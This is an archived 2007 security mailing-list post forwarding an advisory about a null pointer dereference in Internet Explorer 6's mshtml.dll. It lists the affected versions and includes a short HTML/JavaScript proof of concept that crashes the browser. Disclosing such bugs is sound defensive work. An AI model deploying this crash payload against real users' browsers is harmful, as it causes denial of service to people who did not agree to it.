Lexa Software: Security-Alerts@yandex-team.ru archive

		Apache-Talk @lexa.ru
		Inet-Admins @info.east.ru
		Filmscanners @halftone.co.uk
		Security-alerts @yandex-team.ru
		nginx-ru @sysoev.ru

СТАТЬИ

ПЕРСОНАЛЬНОЕ

ПРОГРАММЫ

ПИШИТЕ
ПИСЬМА

АРХИВ :: Security-alerts

Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [EXPL] MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)

To: <security-alerts@xxxxxxxxxxxxxx>
Subject: [security-alerts] FW: [EXPL] MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
From: "Kazennov, Vladimir" <Vladimir.Kazennov@xxxxxxxxxx>
Date: Wed, 7 Feb 2007 13:42:40 +0300
Content-class: urn:content-classes:message
List-archive: <http://www.lexa.ru/security-alerts/> (Web Archive)
List-id: <security-alerts.yandex-team.ru>
List-subscribe: <mailto:majordomo@yandex-team.ru?body=subscribe%20security-alerts>
List-unsubscribe: <mailto:majordomo@yandex-team.ru?body=unsubscribe%20security-alerts>
Thread-index: AcdKojL48rJHqAKCSqqIaynsV91rMQAAnTYg
Thread-topic: [EXPL] MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)

> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Wednesday, February 07, 2007 12:07 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] MS Internet Explorer 6 Null Pointer 
> Dereference Exploit (mshtml.dll)
> 
> - - - - - - - - -
> 
> 
> 
> MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll) 
> 
> 
> 
> Microsoft Internet Explorer version 6 crashes when you open 
> the attached HTML page, this is due to its attempt to 
> dereference a NULL pointer. 
> 
> 
> Vulnerable Systems: 
>  * Microsoft Internet Explorer version 6.0.2800.1106; SP1 
> (Windows 2000 Advanced Server) 
>  * Microsoft Internet Explorer version 
> 6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro) 
> 
> Exploit: 
> <!-- 
> + Title: Microsoft Internet Explorer Malformed HTML Null 
> Pointer Dereference Vulnerability (mshtml.dll) (0-day) 
> 
> + Bug discovered & exploit coded by AmesianX in 
> powerhacker.net (YoungHo Park - amesianx@xxxxxxxxx) 
> 
> + Critical: Critical 
> 
> + Impact: MS Internet Explorer 6 -> Crash (Denial of Service) 
> 
> + Where: From remote 
> 
> + Tested Operating System: Windows XP SP2 FULL PATCHED 
> (Korean Language) 
>                                           Windows 2000 
> Advanced Server (Korean Language) 
> 
> + Tested Software: Microsoft Internet Explorer 
> Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server) 
>                             Microsoft Internet Explorer 
> Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro) 
> 
> + Solution: Not Patched (zero-day) 
> 
> + Description: 
>   The following bug was tested on the latest version of 
> Internet Explorer 6 on a fully-patched 
>   Windows XP SP2 system. this bug will crash when executing a 
> 'for' scripts. 
> 
> + The following proof-of-concept is also available: 
>   http://www.powerhacker.net/exploit/IE_NULL_CRASH.html 
> --> 
> 
> <html> 
>  <head> 
>   <title> AmesianX, RC_No1 in powerhacker.net 
> (amesianx@xxxxxxxxx, RC_No1@xxxxxxxxx)</title> 
>  </head> 
>  <body> 
>   <script language='javascript'> 
>    var data = document['getElementById']; 
>    for(var key in data); 
>   </script> 
>  </body> 
> </html> 
> 
> 
> Additional Information: 
> The original article can be found at: 
> http://www.milw0rm.com/exploits/3272 
> 
> 
>

Prev by Date: [security-alerts] FYI: Hackers Attack Key Net Traffic Computers
Next by Date: [security-alerts] FW: [NEWS] Jetty Session ID Prediction Vulnerability
Previous by thread: [security-alerts] FYI: Hackers Attack Key Net Traffic Computers
Next by thread: [security-alerts] FW: [NEWS] Jetty Session ID Prediction Vulnerability
Index(es):
- Date
- Thread